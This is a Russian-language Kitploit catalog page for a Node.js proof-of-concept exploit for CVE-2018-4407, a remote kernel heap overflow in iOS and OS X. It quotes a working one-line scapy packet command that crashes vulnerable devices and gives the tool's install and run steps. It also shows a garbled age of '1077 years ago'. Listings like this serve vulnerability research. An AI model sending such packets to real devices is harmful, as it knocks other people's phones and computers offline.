Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
node-cve-2018-4407 — Код PoC-эксплойта для Node.js (CVE-2018-4407) | Kitploit
Инструменты/GitHubGitHub/samdecrock/node-cve-2018-4407
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubsamdecrock/node-cve-2018-4407

node-cve-2018-4407

Код PoC-эксплойта для Node.js (CVE-2018-4407)

Репозиторий
1077 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

node-cve-2018-4407

Node.js PoC эксплоит для CVE-2018-4407

Автор: Sam Decrock

Этот скрипт основан на scapy-скрипте, предоставленном Zuk:

iOS 12 / OS X *Удаленное переполнение кучи ядра (CVE-2018-4407) POC* в твите:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

— Zuk (@ihackbanme) 1 ноября 2018 г.

Он приводит к краху устройств с iOS 11 или более ранними версиями, а также некоторых версий OS X.

Установка модулей

Для установки необходимых модулей выполните:

root@kitploit:~
npm install

Запуск

Для запуска передайте IP-адрес цели в качестве аргумента:

root@kitploit:~
node attack.js 192.168.1.20

Дополнительная информация

Оригинальная статья Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

Скачать инструмент